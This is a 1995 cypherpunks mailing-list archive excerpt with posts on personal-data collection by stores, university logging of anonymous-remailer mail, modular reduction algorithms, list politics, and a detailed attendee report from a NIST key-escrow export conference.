From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 22:51:21 PDT
To: cypherpunks@toad.com
Subject: Collection of persona
In-Reply-To: <8B09569.000504D5D6.uuout@the-matrix.com>
Message-ID: <8B0A00E.000504D665.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



DM|Depends on the counter people. The local RS here the clerks don't care
  |much about it and will enter a random number.

        I wish they would do that here.  I've just about yanked a
        manager over the counter over it.

  |A local Service Merchandise
  |does the same thing, but they're pesky, so I make up silly names to test
  |the wits of impatient teenage mutant cashiers.  (They also used to have
  |a computer where you enter your telno. and place orders to pick up at
  |the desk... I don't think the system bills you automatically but the
  |employees probably won't like it when you have them get 10 wieght sets
  |out...)

        <chuckle>  I love it when the system has a flaw I can take
        a crowbar to.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.

 -- SPEED 1.40 [NR]: Evaluation day 134...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Wed, 6 Sep 95 21:53:31 PDT
To: cypherpunks@toad.com
Subject: Re: University logging mail to anon.penet
In-Reply-To: <Pine.ULT.3.91.950906230159.23134A-100000@krypton.mankato.msus.edu>
Message-ID: <199509070454.AAA19936@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


hayden@krypton.mankato.msus.edu said:
> I'd say that there are some serious ethical and legal concerns that 
> should be addressed by the administration for keeping such logs... 

Ethical I would definately agree with.

Legally, I'm not so sure of. The applicable law would appear to be the 
Electronic Communications Privacy Act of 1986. The law does allow 
administrators to see messages in the normal course of their job, as long as 
they don't reveal that information to a 3rd party (except law enforcement in 
the event of a criminal act)

This protection is probably strongest with a company you purchase Internet 
Service from, probably lesser so with a University, since there is less 
obviously a customer/seller relationship, and almost non-existant with a 
business, since there isn't a customer relationship, and the systems are owner 
by the business.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Wed, 6 Sep 95 23:21:56 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
Message-ID: <m0sqaLG-00061XC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:38 PM 9/6/95 -0400, hallam@w3.org wrote:

>People who go round drawing parallels to gun ownership and cryptography 
>ownership are simply playing into the governments hands. 
  
Which of our rights would you have us surrender so as to not play into the
government's hands?


>Cryptography has net  benefits to society. 
  
You would have a hard time proving that cryptography has more, or
different "net benefits to society" than gun ownership does.
  


>Most advocates of gun ownership tend to convince me of 
>little more than they are a danger to society. Regardless of their case
they are 
>the biggest argument for gun control, and therfore poor advocates of their 
>cause. 
  
Statists say the same thing about crypto-advocates.  Talking about 
keeping secrets, and discussing which methods are uncrackable
by the government is not what a statist wants to hear - and neither
is talk about the real reason behind the 2nd Amendment.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 7 Sep 95 01:31:22 PDT
To: jsimmons@goblin.punk.net
Subject: Re: University logging mail to anon.penet
Message-ID: <199509070815.AA00296@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Jeff Simmons writes:

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.

With respect to logging of student traffic, I'd look at the Family 
Education Rights Privacy Act ("Buckley Amendment", 20 USC 1232g) and
the California analog to it (assuming one exists; Oregon's is located
at OAR 571-20-005, et seq.). The release of information about individual
students beyond "directory information" (e.g., name, dates of attendance,
degrees granted, etc) is sharply limited without the consent of the
student. Information about mail traffic sent and received is, IMHO,
arguably (but not clearly) within "educational records" for FERPA 
purposes. 

To establish a Buckley Amendment violation (and I'm not saying there
was one here) you'll still need to find a University employee to pin
the disclosure on. If it's a University employee who posted them to
the newsgroup, it's easy. If the University employee merely maintained
those records in a place where an outsider was able to easily gain 
access to them, it seems like a bigger stretch. 

I had occasion to talk with a relatively high-level administrator in
the University of Oregon's computer center some time ago and he
explained that they've had to go to some trouble to make sure that
gopher/WWW directories and other contemporary university computing
practices don't fall afoul of the Buckley Amendment. Perhaps the
powers that be at other places aren't quite so forward-thinking 
(or don't have the questionable benefit of being next door to a
building full of law students with time on their hands). 

Perhaps an even longer stretch would be an argument that the practice
of logging (and of keeping those logs in an insecure place) violates
students (and others') right to privacy. Federal protection for a
"right of privacy" is fickle, but California protects its citizens'
right to privacy in its constitution.

(I'm not an attorney (yet), don't live in California (right now) and
consequently don't know much about CA law. So please think about this
message as maybe a hint in (I hope) a useful direction, not necessarily
the right answer. Feh.)

This concrete issue seems like a good reminder of the implications of
the way that we think about "cyberspace" and the things that happen 
when we use computers. If one thinks about a machine or a network as
"public space", logging or reporting activities which happen there
(e.g., Alice walks over to visit Bob, leaving footprints everyone can
see in /var/adm/syslog) seems reasonable or at least not offensive,
and it seems silly to talk about being angry because someone wrote down
what everyone could see. But if we think about machines and networks
as being private space, reporting on what Alice and Bob do seems
tacky and rude at best, and horrifying (and likely to create liability)
at the other end of the spectrum. As much as I dislike the 
"cyberspace" metaphor, its use or misuse has serious consequences.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME6qJH3YhjZY3fMNAQHiQgP9HjqkwOzMabzXXbUKp0W7c2MAn4na5X1X
UPVY8p70abNVpPoVFGQTUpgBnv3hBy40n5RFD9pNM7c2UPwq0C8Tcir9TBr+xEH7
L7iQCjsqIK5F1lv66C5yMFu8wfiRF10hMhTJYthOa04dyP10HovT2QameGw+DZHJ
og1t7owgcco=
=D5PV
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@japan.sbi.com>
Date: Wed, 6 Sep 95 09:17:28 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: "This discussion is off-topic, please take it elsewhere"
In-Reply-To: <Pine.PMDF.3.91.950906102111.539017112C-100000@umiami.ir.miami.edu>
Message-ID: <Pine.SUN.3.91.950907011451.4869A-100000@doe905f>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 6 Sep 1995, Michael Froomkin wrote:
>
> You keep talking about this "Eric Hughes" nym.  I've been a member of 
> this list for weeks, months, over a year even, and I never see any posts 
> from "him".  Is he a dead tentacle?

[deleted]

> 
> This post is smiley-free and may injure the humor-impaired.
> 

is he kidding ?

-Jon

PS: In case I qualify as humor impaired - Eric 'potty-trains' majordomo.

--
  Jonathon Fletcher, Salomon Brothers Asia Limited, Tokyo
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 22:50:15 PDT
To: rsnyder@janet.advsys.com (Bob Snyder)
Subject: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509070454.AAA19936@janet.advsys.com>
Message-ID: <199509070542.BAA23214@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bob Snyder wrote:

> hayden@krypton.mankato.msus.edu said:
> > I'd say that there are some serious ethical and legal concerns that 
> > should be addressed by the administration for keeping such logs... 
> 
> Ethical I would definately agree with.
> 
> Legally, I'm not so sure of. The applicable law would appear to be the 
> Electronic Communications Privacy Act of 1986. The law does allow 
> administrators to see messages in the normal course of their job, as long as 
> they don't reveal that information to a 3rd party (except law enforcement in 
> the event of a criminal act)

I'm no lawyer, but I believe that technically the ECPA allows them to view
mail when it is part of maintenance, which could be in the "normal course of
their job[s]" but I think it means that if they see mail while maintaining
(ie, bounced msgs) it's Ok to read it but maintenance doesn't mean outright
monitoring of mail.

Then again, what does the ECPA say about monitoring message traffic? That's
essentially what they are doing, and likely they will rationalize it as
being to save their own skins.  It also might be the work of a SysAdmin
and the school administration would be entirely clueless about it.  Another
possibility is that a hacker (the same who got ahold of the file?) put in
something to monitor it... (my knowledge of Unix is little, though...)

> This protection is probably strongest with a company you purchase Internet 
> Service from, probably lesser so with a University, since there is less 
> obviously a customer/seller relationship, and almost non-existant with a 
> business, since there isn't a customer relationship, and the systems are owner 
> by the business.

I've heard some nasty stories about boards and a couple of I-Net providers
who charge for access but reserve the right to throw someone off the system
without refund (it's often in the terms of many account applications) for
various no-nos.

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 7 Sep 95 00:31:53 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: What is truth?
In-Reply-To: <ac73d35421021004239f@[205.199.118.202]>
Message-ID: <199509070729.CAA01800@einstein>
MIME-Version: 1.0
Content-Type: text



> 
> I promise to be mercifully brief. This is a subject that we could all go on
> and on about. I used the ironic "What is truth?," a la Pilate, to indicate
> some degree of ambiguity. How Jim concluded that I have some absolutist
> viewpoint from this simple line is unclear to me.
> 

Actually from your statement I would conclude that you don't believe truth
exists at all. That was the original in context intent of the quote you
used. Ambiguity is like pregnancy, it is there or isn't. Bottem line being
whether your position is that there is or isn't an absolute it falls to the
same line of argument...faith. 

My personal opinion is that we are way to ignorant/stupid to ever answer
the question.

> In any case, I don't believe there are "independent and ubiased parties"
> who can determine what truth is. Not that there is no measure of truth. I
> am no solipsist, and I believe we have a much clearer view today of how
> things work than we had, say, 500 years ago. Courtesy of science and the
> core idea of falsifiability.
> 

This is exactly the opinion of the great minds of their time as well. I
suspect you are just as wrong as they were. If this isn't solipsism I don't
know what is. We are no valid measurer of our ignorance. We are simply to
close to see where the horizons truly are. The catch here is we will always
be to close.

The real issue is not whether there is an observer who can discern the truth
but rather; is there a truth to discern in the first place?

> 
> And the law stays out of confirming or refuting religious claims. If
> Preacher Bob says that praying to Baal will save one's soul, no law officer
> will step in and stop this "lie." As I like to put it, of the N different
> religions, at most _one_ of them is "true," and the other N - 1 are based
> on lies. So, if we are to "allow" religious freedom we must surely allow
> lies to be told. Q.E.D.
> 

You are confusing 'lie' and 'opinion'. No religion is true, they are based
on faith and therefore unprovable. That which is unprovable is neither truth
or lie, it simply is.

> 
> Somewhere along the line we've adopted the new view that government needs
> to correct all incorrect thoughts, needs to protect people from "hurtful"
> ideas and speech, and needs to determine what is true and what is not true.
> 

Who is this 'we' kimo-sabi? If this were true 'we' wouldn't even be having
this discussion. As to it being a new idea, hardly.

> "evolutionary epistemology," especially the writings of William Bartley and
> Karl Popper.
> 

Read some of them, believe they are as full of shit as all other philosophers
when taken as a whole. While individual ideas that these folks have presented
have quite a bit of merit as a whole not a single philosopher has ever
produced a work that has really been ground shattering. You disagree? Then
explain why no philosopher has managed to over shadow all the others?

{And for those Christians out there who will invariably send me mail,
Christianity is not the largest religion in the world, only in the US does it
hold a numerical superiority.} 

The reason is quite simple and one of the main problems with philosophers
and politicians. They keep making the same damn mistake, they assume that
since it works for them it will work for anyone (and therefore everyone) else.
This is an incorrect assumption. The real problem with philosophers and
politicians is that at some point they start to believe their own press
releases.

Consider this, if 'truth' is so hard to define or observe why is there not a
equaly biased discussion about 'lie'? Few people have a problem with the
concept of a lie. We can argue blissfully for centuries over what truth is
but if we question what a lie is we get termed pathological. What is it about
human psychology that causes this?

Take care.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 7 Sep 95 01:14:50 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: fast modular reduction
In-Reply-To: <199509070157.VAA16973@clark.net>
Message-ID: <199509070811.EAA07559@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
> modifications. Is there an algorithmic analysis available? I also
> I think there is a bug in your description. Let k+1 = n+1
> (e.g. the dividend is 1 more "block" than the modulus). Then
> i=n starting out, and we have

 Upon a closer look, I see there's no mistake. The algorithm will
never reach k=n because the loop stops at n+1.

 Anyway, I played around with the algorithm a little, and it's neat
and easy to implement, but the speed increase is not worth
the patent hassle (assuming there is a speed increase, I saw none)

  The algorithm is still basically O(n^2) if used in a modexp
routine. It requires n^2 multiplications and additions. Whereas,
a typical Karatsuba multiplication using a high precision
reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8
additions. (for n=64 which is a 2048-bit number being reduced, 
it's about 1/5 the multiplications, but 5 times the additions)


Two other possible algorthms are:

Let P(x) = sum(i=0 to n-1) a_i x^i be a multiprecision integer
radix x.

If m is a modulus, of length n/2, rewrite P(x) as

sum(i=0 to n/2-1) a_i x^i  + x^(n/2) (a_{n/2 + i} x^i)

break the summation into two parts. Focus on the second term.
(both terms are not equal, or one digit larger than the modulus)
Perform modular reduction of the right hand polynomial using
Horner's method

x*(x*(x*...(x*a_i + a{i-i} mod m)mod m)mod m) 

Those internal mod m's can be done quickly with a 2-digit
trial quotient estimation.


It's still O(n^2), but might be quicker.

Still another technique..

Rewrite P(x) 

(a_0 + a_2 x^2 + a_4 x^4 + ...) + x (a_1 + a_3 x^2 + a_5 x^4 + ...)

[broken into two Polys with odd and even terms)
Factor out x^2 out of each piece and write

a_0 + ((a_2 + a_4 x^2 + a_6 x^4 + ...)*x^2) + 
x*(a_1 + x^2*(a_3 + a_5 x^2 + a_7 x^4 + ...)

Now keep applying the recursive rule until the length of the
poly pieces are the same or smaller than the modulus. Now,
start evaluating from the inner layers. Multiply each piece by
x^2 (two shifts), and take the mod. Sum the results, shifting one side by 
1 (for the x factor). Shifts are free because an array representation
yields a shift with a pointer movement.


It looks kinda like the method for evaluating  FFTs a little bit,
but it's not. Just something off the top of my head just now.
(I hereby place it in the public domain assuming it's worth
anything, no patents please)  I think with a clever implementation, you can 
trade some mults for more adds, but still use less additions than russian 
peasant.


-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Sep 95 01:37:22 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID: <199509070834.EAA04213@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Was this really needed?

Gary Jeffers writes:
>                     ON  OFF-TOPIC
> 
>      THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Arnold <warnold@ptialaska.net>
Date: Sun, 10 Sep 95 17:22:38 PDT
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <199509041203.IAA38469@tequesta.gate.net>
Message-ID: <42lvht$2br@news.dgsys.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sorry.  I got into this thread late.  Where can I get a "munitions" 
t-shirt?  If anyone knows, please e-mail me with the info.  I'll wear it 
to work.  (I do telephones for a paycheck, and often work in "government" 
offices.)

Thank you very much for the info.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 02:49:55 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Collection of personal info
In-Reply-To: <199509062144.RAA05718@cushing.bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950907054538.15660A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Adam Shostack wrote:

> 	No.  But the interesting question is, what to do about it?
> The answer in part, is personal anonymity through cash and avoiding US
> IDs.  But in the long run, thats broken.  You can't have privacy for
> 1000 people; they'll just toss us all in jail.

I doubt if TRW will throw you in jail for avoiding their database.  Last 
time I looked, it wasn't (very) illegal to avoid US IDs.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 03:05:41 PDT
To: Buford Terrell <terrell@sam.neosoft.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509062335.SAA02364@sam.neosoft.com>
Message-ID: <Pine.SUN.3.91.950907060030.15660D-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Buford Terrell wrote:

> How could crypto put lawyers out of business?  People would still
> have disagreements; plans would still go wrong; cars would still
> crash.  More important, transactions would still need to be 
> structured to carry out the desires of the parties while minimizing
> risks.
> 
> Good communications technology, including crypto, could make lawyering
> more efficient, but I suspect the savings would be minimal.

Well, if crypto reduces the role of government in human affairs, it will 
reduce work for lawyers.  Telecoms will certainly break the professional 
monopoly of lawyers (and other professionals).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Wed, 6 Sep 95 23:54:39 PDT
To: cypherpunks@toad.com
Subject: not a flame please read and think about this
Message-ID: <9509070626.AA07408@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


why is it that half the
people who post here work for the government or big companies that are doing
governments bidding (rand.org (which is part of the the nsa!) att.com (makers of the clipper chip)
mit (which onwns rsa)
netscape etc etc)

what makes me wonder isnt so much that theyre here but that they post socalled
reasonable stuff that supports the  the government line.
like when these people report on
what the nsa guy says at the crypto convention as if were supposed to take it
seriously and these people who say clipper is good enough no back doors.
and then everyone takes this crap seriously.

obviously the government thinks there are some things we shouldnt think
about ourselves. and then someone comes along and says theyve thought about
it already and we should just go mind our own biz. arent we supposed to be
cypherPUNKS? than why do we need these people to think for us?

honest replies only please. i dont mean to flame but this really bothers me. we should maybe think about a closed list.




----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Sep 95 03:27:43 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: not a flame please read and think about this
In-Reply-To: <9509070626.AA07408@anon.penet.fi>
Message-ID: <9509071027.AA15077@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I feel it's my civic duty to respond to these things, but there's nothing
new here. NOISE.

an116512@anon.penet.fi writes:
> why is it that half the
> people who post here work for the government or big companies that are doing
> governments bidding

*sigh* This line gets trotted out every few months here, like clockwork.
You should look for similar threads in the archives. Allow me to sum them up
for you, meanwhile: who cares ?  Perhaps it's because the government and big
corporations have (surprise) flocks of people working for them. Your 
assertion that fully 50% of the posters to the list overtly work for such 
organizations is patently absurd, anyway.  

[...]
> what makes me wonder isnt so much that theyre here but that they post 
> socalled reasonable stuff that supports the  the government line.
> like when these people report on what the nsa guy says at the crypto
> convention as if were supposed to take it seriously

What alternative do you propose ?  Are we merely to chuckle and say, "Oh,
those guys at the NSA are such kidders. As if they actually had any
influence on public policy decisions in the U.S.  What a hoot !"  ?

> and these people who say clipper is good enough no back doors.
> and then everyone takes this crap seriously.

Eh ?  David Sternlight isn't openly on the list; whom do you have in mind ?

> obviously the government thinks there are some things we shouldnt think
> about ourselves. 

(Agreed)

> and then someone comes along and says theyve thought about
> it already and we should just go mind our own biz. arent we supposed to be
> cypherPUNKS? than why do we need these people to think for us?

Unless you can be more specific about this, I really have no idea to what and
whom it refers.

> honest replies only please. i dont mean to flame but this really bothers me. 

BTW, if not for this line I wouldn't even have bothered replying.

> we should maybe think about a closed list.

Feel free -- no-one is stopping you or anyone else from creating one. You 
could even announce it here. I'll still be here listening to Matt Blaze,
Jim Gillogly, Derek Atkins, Jeff Weinstein, et al. But then again I've
worked at a govt. lab too, so I guess I wouldn't be welcome on your list
either. Darn.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Sep 95 06:57:16 PDT
To: cypherpunks@toad.com
Subject: Re: What is truth?
Message-ID: <199509071356.GAA01805@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance:  Absolutely none:

At 10:57 PM 9/6/95 -0700, Timothy C. May wrote:
> If you want more information on my views about truth, check out 
> the work on "evolutionary epistemology," especially the writings 
> of William Bartley and Karl Popper.

Popper went off the deep end because he tried to justify science
without relying on the principle of induction, or its equivalent,
Bayesian probability.

A hopeless endeavor, like the attempt of the behaviorists 
to describe behavior without reference to intention, desire, 
and knowledge.

His reasoning leads logically to the polylogism of the
fascists, an outcome he imagines he avoided, but in fact 
he merely rephrased in language that superficially sounds 
more favorable to science.

Bayesian probability leads us to the conclusion that some 
scientific theories have a probability of truth that is 
exponentially close to unity.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 7 Sep 95 07:06:42 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
In-Reply-To: <9509070626.AA07408@anon.penet.fi>
Message-ID: <199509071406.HAA07763@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> an116512@anon.penet.fi writes:
> like when these people report on
> what the nsa guy says at the crypto convention as if were supposed to take it
...
> honest replies only please. i dont mean to flame but this really bothers me. 
>we should maybe think about a closed list.

Time to mark my calendar -- flamed on the same day by David Sternlight in
alt.security.pgp for espousing cypherpunk ideals and by an anonymous
person on C'punks for being a government stooge.  I must be doing
something right.

16 Halimath -- red letter day.

	Jim Gillogly
	Highday, 16 Halimath S.R. 1995, 14:05




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Sep 95 04:26:42 PDT
To: dccp@eff.org
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID: <26714.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----


Here are my noted and remembered impressions from Wedensday's NIS&T 
conference on key escrow (aka GAK) export. Please note that there is 
a separate conference next week on creating a FIPS PUB standard for 
key escrow. That standard will be promulgated, just as GOSIP, POSIX 
and Clipper/Skipjack were promulgated. This export conference was 
separate from that FIPS standardization process.

I got stuck in a construction traffic jam, and missed the introductory
speaches. Perhaps one of the other c'punks can fill us all in on what I
missed.

The first item is that the export criteria will be changed. A small number
of bits will be added to unescrowed crypto, and 64-bit escrow'd (GAK'd)
systems will be allowed. They don't care which algorithm is used, DES, RC4,
blowfish, etc. They care about key length. If it is short enough, it is
exportable.

The conference seemed to be an attempt to co-opt industry into agreeing
that 64-bit GAK is much better than the current situation. After all,
it would be too strong for a "hacker in France" to break it.

When they opened the floor, there were a few comments/questions
that indicated that not everyone was convinced that this was a good thing.
I pointed out some graduate students don't consider "hacker" a compliment,
and that I thought Damian did a great job breaking RC4-40. I also pointed
out that it was broken again in 31 hours with a "bunch of commercial
systems, Sun and Pentiums" with no need for suaercomputers. 

I then asked if the criteria were fixed, as setting criteria controls the
result. The NIS&T approved board said that changes to the criteria was 
part of why the conference was being held.

The next hour and a half was presentation from "industry." Essentially
comments on the proposal. Nearly all of the spokesmen said that the criteria
were flawed. Some said that they already had commercial products
that met most of the real needs of the industry (key recovery) but they
didn't meet the NIS&T/NSA "criteria." Probably the strongest was the
condamnation by Robert Holleyman of the Business Software Alliance.

Hollyman said that BSA represents firms such as Microsoft, Novell, Lotus,
Sybase, SCO, Autodesk, and Intergraph. He said that current policy "directly
threatens" the industry because of "The US Government's continuing refusal
to adopt realistic export control policies." He went on and on.
It was clear that his position is that the proposed policy is a mistake.

After the presentations, there were more questions. I proposed one
additional criteria (based on email that I received from the c'punks):
How do we expire court approved access to encrypted data, so that once the
court orders are over, the LEAs no longer have the ability to decrypt.
The answer was that with clipper, special hardware is needed, and it goes
away when the court order does. I asked how that model worked in a software
only world. There were mumbled statements about adding it as a criteria.

The conference then broke for lunch and breakout groups. The one I was in
discussed criterias 5 and 6 of Topic 3, published in my URL
http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
They are short enought to reproduce here.

5.    The product shall be resistant to any alteration that would
      disable or circumvent the key escrow mechanism, to include
      being designed so that the key escrow mechanism cannot be
      disabled by a static patch, (i.e., the replacement of a
      block of code by a modified block).

6.    The product shall not decrypt messages or files encrypted
      by non-escrowed products, including products whose key
      escrow mechanisms have been altered or disabled.

After I commented that the person writing the notes has the ability to
detirmine what was said, the folks from NSA and NIS&T asked me to take 
the notes. I love it; but I did try to be objective.

In the middle of this discussion, a government-generated, but anonymnous
paper was distributed. It had "Example Suggested Solutions." It suggeeted
that source code not be available for products suitable for export. It also
suggested other ideas, such as storing a checksum/hash and having the
system "check the cryptographic code several times during its use." There 
was a strong reaction against these suggestions, not because they were
bad ideas, but because the paper was delivered with no prior publication.
This precluded any planned response to its ideas.

We reworded #5 to say "want to Trust the Product." This means that it 
is untampered, works as expected, etc. We then hashed out ways to 
know this. The list ended up looking like:
1. is available only as object code
2. contains some "hash" function to check for modifications
3. contains some unique hash, with uniqueness based upon something 
        like "site," "per copy" or "per release" 
4. Contains policies against modification, such as liscense language        
        against decompilation.
5. OS-related security, such as runs "protected mode" instead of as a 
        wild DOS program.

Of course, the software vendors went wild against "per copy" identifiers,
saying it would add two orders of magnitude worth of problems to 
manufacturing.

The items on the list were not "must have all of these" rather it was
a pick-and-chose menu. We also required that the standard allow
for technical innovation to keep up with the evolving state of the art.

The discussion of #6 was more lively. We took a long time figuring out what
it said. For instance, could ViaCrypt sell a product that was compatible
with PGP 2.6.2 (non-escrowed) that also worked with the new escrowed
ciphers? It seems to me, and a lot of other folks there, that such a product
would be non-exportable. We simplified the criteria to:
  "right products won't talk to wrong products."
with "right products" meaning those that are exportable, and wrong products
being those that aren't, or are hacked, or ...

We then developed "goals" including:
1. One version for sale worldwide
2. Allow development in the US
3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-)
4. Must interoperate with everything
5. Receiver can only decrypt if escrow agencies can decrypt.

This leads to a bunch of issues and observations, including:
a. Can goals 1, 2, and 4 be met simultaneously?

There was a suggestion of a "friendly man-in-the-middle" who would
receive a GAK'd conversation, and strip off the GAK parts, and reencrypt
it, and retransmit it to a non-GAK user. Which leads to:
b. Can we prohibit a friendly MITM?

The big issue was:
c. Startup compatibility. No one will buy products unless they have
sales attractiveness. This means compatibility with existing systems.
Yet the criteria #6 seems to say that approved products must refuse
backwards compatibility.

This was labeled a "non starter" by the group.

The consensus was that companies can develop a substantial competitive
advantage by developing off-shore and offering both escrowed encryption
and compatibility with existing systems.

There was a discussion of grandfathering in some technologies.
This was to help interoperability. The conversation became fuzzy,
Grandfather technologies included DES, 3-DES, IDEA, and long key RC4.

One key idea was that it may make sense to allow software that encrypts with
escrowed keys, but can also decrypt with any algorithm. This allows the LEA's
to access outgoing messages, while allowing interoperability.

The discussions frequently wandered to discuss the language of the criteria.
The wording was considered simultaneously too subjective  and impractical.
For example, we considered the phrase "tamper resistant" to be preferable 
to the original "prevent tampering," because it is impossible to absolutly
prevent modification to software.

The issue of interoperability was raised repeatedly. 
It is critical that exportable products interoperate with other,
existing export products. 

The last issue in the session was that the length of the key, 64-bits,
was defined in criteria #1. There was no discussion at the conference on
this criteria. It seems that the NIS&T and NSA folks believe that
this is a closed topic. The folks in the session did not agree. They
felt that 64-bits was not enough.

Once the breakout session was over, the entire conference met together, 
and the "reporter" from each session reported their comments and findings.

All breakout sessions had suggested changes. The group that discussed
criteria #9 recommended removing it. The group that discussed criteria #2 
(no multiple encryption) reported that industry was working on a general 
solution to the problem of key recovery, and that their solution would 
probably appear as quickly without the government's "help." 

Several groups identified that there are at least two separate 
problem domains: communications and data storage. Communications 
typically is short term, and has unique keys for each session. 
Data storage has far fewer keys that are used
for long periods. Several speakers suggested that while communications
keys were not suited to be escrowed, there was a large need for
key recovery for data storage. There was no response from the government
representatives to any of these points. One government speaker
did say that there would be a Federal key escrow standard, period.

After the combined session, there were more break-out sessions. In the one
that I attended, the folks from National Semiconductor described their
CAKE system. This is a smartcard/PCMCIA device that uses 2000+ bit 
public/private key encryption and signatures. They are hoping for export
approval; it is necessary for the project to be viable.  The system looks
pretty interesting, but it too complicated to describe here. In short, 
random session keys are generated and signed with a Data Recovery Center's
public key. The LEAs could then send encrypted session keys to the DRC, 
which would decrypt them, and return the unencrypted session keys which
the LEA could then used to decrypt the messages.

While this is a hardware system, its concepts could be transfered to 
a software implementation.

One obvious problem is that NS' system doesn't meet criteria #8 (retuiring
repeated involvement of the escrow agent), since it may require
hundreds or thousands of session key decipherments. It also has
a number of attractive features, such as never sending the private
key anywhere, only the session key is escrowed.

The general discussion showed concerns that in the international
community, requiring government escrow may cause lose of valuable data,
as some foriegn governments are not as trustworthy as the US. It was
the consensus that requiring users to have 50 or more escrow centers was
unworkable. Yet this could be required for large multinational companies
working in 50 or more countries, if each required a local key escrow service.

The NS model would allow both date stamping of session keys, and periodic
rekeying. Either would satisfy my "unaccepted" Citeria #11, technical
limits to the time that a court ordered decryption could be executed.

There was a discussion of changing the criteria so that only the transmission
of data was concerned with escrow. This would simplify the issue of
multinational escrow. We did not resolve whether this would be sufficient
or acceptable.

Today, we will talk about suitable escrow agencies.

Pat


-----BEGIN PGP SIGNATURE-----
Version: 2.6

